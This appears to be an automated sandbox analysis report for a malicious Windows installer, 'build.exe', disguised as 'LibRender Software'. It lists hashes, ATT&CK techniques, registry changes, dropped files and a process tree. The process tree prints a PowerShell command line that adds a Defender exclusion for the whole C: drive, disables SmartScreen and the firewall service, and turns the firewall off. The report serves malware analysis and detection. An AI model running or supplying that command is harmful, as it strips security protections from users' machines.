211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33

Analysis

max time kernel
115s
max time network
174s
platform
windows7_x64
resource
win7v20210408
submitted
14-10-2021 10:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

build.exe
Size

6.0MB
MD5

5a41f52a595d7b83c3576f09fb7736fa
SHA1

7c3420961acf1fc77533aec0d9e006316c69938f
SHA256

211be6f6699092fb1e0de9ccc77a9d9f4e057be15906ff360fa479dec0ec4e33
SHA512

890916f451bfbeb3d81be521da5184c5f3f912f13663d4e32fb06b56b015c7fd052d3d981f0d035a1f3b416d767bef647d641551f8b5c14ec5c5aed6dbeff548

Score

10^/10

evasion

Malware Config

Signatures

Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

powershell.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4" powershell.exe
Executes dropped EXE 1 IoCs

Processes:

etoapp.exe

pid process

672 etoapp.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start = "4"	powershell.exe

pid	process
672	etoapp.exe

Loads dropped DLL 12 IoCs

Processes:

build.exeMsiExec.exeMsiExec.exemsiexec.exeetoapp.exe

pid	process
1984	build.exe
1984	build.exe
1528	MsiExec.exe
1528	MsiExec.exe
592	MsiExec.exe
592	MsiExec.exe
592	MsiExec.exe
592	MsiExec.exe
592	MsiExec.exe
1984	build.exe
1740	msiexec.exe
672	etoapp.exe

Enumerates connected drives 3 TTPs 64 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

build.exemsiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\A:	build.exe
File opened (read-only)	\??\G:	build.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\M:	build.exe
File opened (read-only)	\??\T:	build.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\I:	build.exe
File opened (read-only)	\??\L:	build.exe
File opened (read-only)	\??\N:	build.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\S:	build.exe
File opened (read-only)	\??\W:	build.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\B:	build.exe
File opened (read-only)	\??\K:	build.exe
File opened (read-only)	\??\F:	build.exe
File opened (read-only)	\??\O:	build.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\P:	build.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\U:	build.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\J:	build.exe
File opened (read-only)	\??\V:	build.exe
File opened (read-only)	\??\Z:	build.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\E:	build.exe
File opened (read-only)	\??\Y:	build.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\H:	build.exe
File opened (read-only)	\??\Q:	build.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in Windows directory 11 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSICCA5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICDDF.tmp	msiexec.exe
File created	C:\Windows\Installer\f7599c2.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\f7599c2.ipi	msiexec.exe
File created	C:\Windows\Installer\f7599c0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICBC9.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICEBA.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID485.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f7599c0.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICD51.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

build.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	build.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	build.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	build.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	build.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

msiexec.exepowershell.exe

pid process

1740 msiexec.exe
1740 msiexec.exe
2008 powershell.exe
2008 powershell.exe

pid	process
1740	msiexec.exe
1740	msiexec.exe
2008	powershell.exe
2008	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exebuild.exe

description	pid	process
Token: SeRestorePrivilege	1740	msiexec.exe
Token: SeTakeOwnershipPrivilege	1740	msiexec.exe
Token: SeSecurityPrivilege	1740	msiexec.exe
Token: SeCreateTokenPrivilege	1984	build.exe
Token: SeAssignPrimaryTokenPrivilege	1984	build.exe
Token: SeLockMemoryPrivilege	1984	build.exe
Token: SeIncreaseQuotaPrivilege	1984	build.exe
Token: SeMachineAccountPrivilege	1984	build.exe
Token: SeTcbPrivilege	1984	build.exe
Token: SeSecurityPrivilege	1984	build.exe
Token: SeTakeOwnershipPrivilege	1984	build.exe
Token: SeLoadDriverPrivilege	1984	build.exe
Token: SeSystemProfilePrivilege	1984	build.exe
Token: SeSystemtimePrivilege	1984	build.exe
Token: SeProfSingleProcessPrivilege	1984	build.exe
Token: SeIncBasePriorityPrivilege	1984	build.exe
Token: SeCreatePagefilePrivilege	1984	build.exe
Token: SeCreatePermanentPrivilege	1984	build.exe
Token: SeBackupPrivilege	1984	build.exe
Token: SeRestorePrivilege	1984	build.exe
Token: SeShutdownPrivilege	1984	build.exe
Token: SeDebugPrivilege	1984	build.exe
Token: SeAuditPrivilege	1984	build.exe
Token: SeSystemEnvironmentPrivilege	1984	build.exe
Token: SeChangeNotifyPrivilege	1984	build.exe
Token: SeRemoteShutdownPrivilege	1984	build.exe
Token: SeUndockPrivilege	1984	build.exe
Token: SeSyncAgentPrivilege	1984	build.exe
Token: SeEnableDelegationPrivilege	1984	build.exe
Token: SeManageVolumePrivilege	1984	build.exe
Token: SeImpersonatePrivilege	1984	build.exe
Token: SeCreateGlobalPrivilege	1984	build.exe
Token: SeCreateTokenPrivilege	1984	build.exe
Token: SeAssignPrimaryTokenPrivilege	1984	build.exe
Token: SeLockMemoryPrivilege	1984	build.exe
Token: SeIncreaseQuotaPrivilege	1984	build.exe
Token: SeMachineAccountPrivilege	1984	build.exe
Token: SeTcbPrivilege	1984	build.exe
Token: SeSecurityPrivilege	1984	build.exe
Token: SeTakeOwnershipPrivilege	1984	build.exe
Token: SeLoadDriverPrivilege	1984	build.exe
Token: SeSystemProfilePrivilege	1984	build.exe
Token: SeSystemtimePrivilege	1984	build.exe
Token: SeProfSingleProcessPrivilege	1984	build.exe
Token: SeIncBasePriorityPrivilege	1984	build.exe
Token: SeCreatePagefilePrivilege	1984	build.exe
Token: SeCreatePermanentPrivilege	1984	build.exe
Token: SeBackupPrivilege	1984	build.exe
Token: SeRestorePrivilege	1984	build.exe
Token: SeShutdownPrivilege	1984	build.exe
Token: SeDebugPrivilege	1984	build.exe
Token: SeAuditPrivilege	1984	build.exe
Token: SeSystemEnvironmentPrivilege	1984	build.exe
Token: SeChangeNotifyPrivilege	1984	build.exe
Token: SeRemoteShutdownPrivilege	1984	build.exe
Token: SeUndockPrivilege	1984	build.exe
Token: SeSyncAgentPrivilege	1984	build.exe
Token: SeEnableDelegationPrivilege	1984	build.exe
Token: SeManageVolumePrivilege	1984	build.exe
Token: SeImpersonatePrivilege	1984	build.exe
Token: SeCreateGlobalPrivilege	1984	build.exe
Token: SeCreateTokenPrivilege	1984	build.exe
Token: SeAssignPrimaryTokenPrivilege	1984	build.exe
Token: SeLockMemoryPrivilege	1984	build.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

msiexec.exe

pid process

1792 msiexec.exe
1792 msiexec.exe

pid	process
1792	msiexec.exe
1792	msiexec.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

msiexec.exebuild.exeetoapp.exepowershell.exe

description	pid	process	target process
PID 1740 wrote to memory of 1528	1740	msiexec.exe	MsiExec.exe
PID 1740 wrote to memory of 1528	1740	msiexec.exe	MsiExec.exe
PID 1740 wrote to memory of 1528	1740	msiexec.exe	MsiExec.exe
PID 1740 wrote to memory of 1528	1740	msiexec.exe	MsiExec.exe
PID 1740 wrote to memory of 1528	1740	msiexec.exe	MsiExec.exe
PID 1740 wrote to memory of 1528	1740	msiexec.exe	MsiExec.exe
PID 1740 wrote to memory of 1528	1740	msiexec.exe	MsiExec.exe
PID 1984 wrote to memory of 1792	1984	build.exe	msiexec.exe
PID 1984 wrote to memory of 1792	1984	build.exe	msiexec.exe
PID 1984 wrote to memory of 1792	1984	build.exe	msiexec.exe
PID 1984 wrote to memory of 1792	1984	build.exe	msiexec.exe
PID 1984 wrote to memory of 1792	1984	build.exe	msiexec.exe
PID 1984 wrote to memory of 1792	1984	build.exe	msiexec.exe
PID 1984 wrote to memory of 1792	1984	build.exe	msiexec.exe
PID 1740 wrote to memory of 592	1740	msiexec.exe	MsiExec.exe
PID 1740 wrote to memory of 592	1740	msiexec.exe	MsiExec.exe
PID 1740 wrote to memory of 592	1740	msiexec.exe	MsiExec.exe
PID 1740 wrote to memory of 592	1740	msiexec.exe	MsiExec.exe
PID 1740 wrote to memory of 592	1740	msiexec.exe	MsiExec.exe
PID 1740 wrote to memory of 592	1740	msiexec.exe	MsiExec.exe
PID 1740 wrote to memory of 592	1740	msiexec.exe	MsiExec.exe
PID 1740 wrote to memory of 672	1740	msiexec.exe	etoapp.exe
PID 1740 wrote to memory of 672	1740	msiexec.exe	etoapp.exe
PID 1740 wrote to memory of 672	1740	msiexec.exe	etoapp.exe
PID 672 wrote to memory of 2008	672	etoapp.exe	powershell.exe
PID 672 wrote to memory of 2008	672	etoapp.exe	powershell.exe
PID 672 wrote to memory of 2008	672	etoapp.exe	powershell.exe
PID 2008 wrote to memory of 344	2008	powershell.exe	netsh.exe
PID 2008 wrote to memory of 344	2008	powershell.exe	netsh.exe
PID 2008 wrote to memory of 344	2008	powershell.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
1⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\adv.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\build.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633955938 " AI_EUIMSI=""
2⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:1792

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C7CEF8D00E745CB203B749A7C02024F4 C
2⤵
- Loads dropped DLL
PID:1528

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 89155E27B6DD5EDB33A4D052A0A1702E
2⤵
- Loads dropped DLL
PID:592

C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software\etoapp.exe
"C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software\etoapp.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(exit)
3⤵
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2008

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
4⤵
PID:344

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MSI63F7.tmp
MD5
3d24a2af1fb93f9960a17d6394484802

SHA1
ee74a6ceea0853c47e12802961a7a8869f7f0d69

SHA256
8d23754e6b8bb933d79861540b50deca42e33ac4c3a6669c99fb368913b66d88

SHA512
f6a19d00896a63debb9ee7cdd71a92c0a3089b6f4c44976b9c30d97fcbaacd74a8d56150be518314fac74dd3ebea2001dc3859b0f3e4e467a01721b29f6227ba

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI6639.tmp
MD5
0be6e02d01013e6140e38571a4da2545

SHA1
9149608d60ca5941010e33e01d4fdc7b6c791bea

SHA256
3c5db91ef77b947a0924675fc1ec647d6512287aa891040b6ade3663aa1fd3a3

SHA512
f419a5a95f7440623edb6400f9adbfb9ba987a65f3b47996a8bb374d89ff53e8638357285485142f76758bffcb9520771e38e193d89c82c3a9733ed98ae24fcb

Download Submit
C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\7-zip.dll
MD5
23c651b2ace76d42fec3989bcba3ce7b

SHA1
378776d20133f20a4c42476bdcb0a408ef1dce1c

SHA256
1b8410f839283a9483369dacdb22290b065ece6f00c026d953024666761532e2

SHA512
e47ae720b9ee4388dacfdbf2ba1e2dc546cc01fdb25a6c82ceeeda03801e449f660e97b3bbb6f65b791bfc1566f21187053472022c6c7c0d68f8cf1187326ec8

Download Submit
C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\CommonManaged.dll
MD5
8e9cdf436f1f6882e2dd2b3e03b296c2

SHA1
b13bb65194a7fc5b9418146d42b2982e7a9839e6

SHA256
2d3df8da35ff210b76ba66c9387f375d87407edfe44a063944236e0f36ffb726

SHA512
7f843451c55b5a2e679516a68b3458ff7390ba06fe8bbda19717aa452aa139310b1984053ef2537ac5c50de1d4ef6ed2450ddfc8f70adb7a0218f1cf3e98119c

Download Submit
C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\DevExpress.Sparkline.v14.2.Core.dll
MD5
e891562a855a6e697559d0d922332bc6

SHA1
bf0a7c56494a693d88e043e8cb7b6539c25f3500

SHA256
a4e8833818879be8f847895c0d69173b8593b319076b865f2e197728451cf197

SHA512
1ed26200b018dd49234ed47703b6589444b587829f0765fbf55ece0fa4b30b182252d32a2d1da65f122b7bcfb4467af01fffb41f49a0c782e6ca3e4e919acf3d

Download Submit
C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\JxCnv-d3d.dll
MD5
3267d34f5c75bd0d3091da2f90a7537e

SHA1
ac3c26c224cb65c3d7aefbd601c997b2c9653ab7

SHA256
71f42c679d48369fe995d828a0b14a11c35939847111645cb829001e6af0dcbc

SHA512
06e8b2759990f83e5d44fac92da1bccce51ca0c9a6a9a7040cc4da9afbfd624538a72c571cf74e1480d05966d5814e0379f493c708ba9516d2e27c59ea3e6035

Download Submit
C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\LICENSE.TXT
MD5
e861259956300fda84ba540e2a63e391

SHA1
5a842455b3d18d9371054bde9cfbad15f9a2aa95

SHA256
6a35ce1eb7da4598b066d2ec3663ab272b28c9bc83ec0ea2319c5708397fdcef

SHA512
c7c8514b4f79abcac214c998d9952048449876cd375d0cb55ee2efb8d2a19afec6dca4519bab4297dd0acf21155d90b849019c23f28fe82692f826488d12eade

Download Submit
C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\Qt5QuickWidgets.dll
MD5
fbe938d603df6da86e3b1cccab37288d

SHA1
5ccb8276cb0e2e97518579412ba975bb8a2ef419

SHA256
df3de6af21f13de3490065879b39e3d7a1d6add10d802b80b9a444555b8a516d

SHA512
a84f29562524bf633517d79ac61f3522ce3f3c91d4c445d05a03718713baea6918fbf7e7c990e779946bfa047662396d1b2d3ad2812c9c0badf2a06e4c7128a7

Download Submit
C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\Qt5SerialPort.dll
MD5
da7428109ec54429d52ee54294b3d3bc

SHA1
501ba92ae0b98e0e7057a189704045d8fe81510a

SHA256
6973bcfae9601d217211191992fdf9a3170857dcd98570686b7b4172150eca7f

SHA512
43e389caf78a8fce4b2d13508dc0e85b2fcdab0d3943ed28b3a9c43ae3df3f0348ba93a78362dfb5e5bda8941d05560db61651cf44524a21bc6757a383f01757

Download Submit
C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\README.txt
MD5
f4c129780818858fa0411f3ade3b7d04

SHA1
0ca16f5b5e0f501006611dcf044e66763dab5f6a

SHA256
fc98d0a4e9b7fee983ebb37864560db4d1f76d5940b1f345a4ce3b7685e5f99a

SHA512
a057c783c19293cf8d4c38b39b79998df9961f93297683deb923af1244b666bf238f8c986ddbd11c4ae1b1e1accf3cefe4c1e70fa6e4933340490d6b059f741b

Download Submit
C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\UtilsLib.dll
MD5
16ff6202991253ff981a6a7fa20436aa

SHA1
f992669261166b099316ea9c6a3b6f16fe86fcd3

SHA256
bd18f22709d63c0156401aca8e63f0e04490f3348191897b7360511221adb134

SHA512
5232f55ab7c0630c0a2d43897f10805bcbda97fae3a661746c4e70fa9ac5a62ac2d1ac8eda09e8b5df6aa24957c43a9beadaf7cac26f88ee3ac7e66eeda1f73d

Download Submit
C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\adv.msi
MD5
0b3cfc792627bc5b045027285ebcbc00

SHA1
2a1ac73878501fb8ff38742c829a43988e66d9a6

SHA256
3dc9753d94fffa4f44f898786714143a50de413e2967feea2b40f01465aca9c4

SHA512
578312cf8276eea8be49a165a10d408dfa5bc72f33cc43495c10c70b661a0772dd4849791129fe18a4808cdd85199ef360996d1ccf493b84c63ac01f4c2733ca

Download Submit
C:\Users\Admin\AppData\Roaming\SilkenMermaid Software\LibRender Software 2.3.0.1\install\311CE8D\bzip2.dll
MD5
4143d4973e0f5a5180e114bdd868d4d2

SHA1
b47fd2cf9db0f37c04e4425085fb953cbce81478

SHA256
da25db24809479051d980be5e186926dd53233a76dfe357a455387646befca76

SHA512
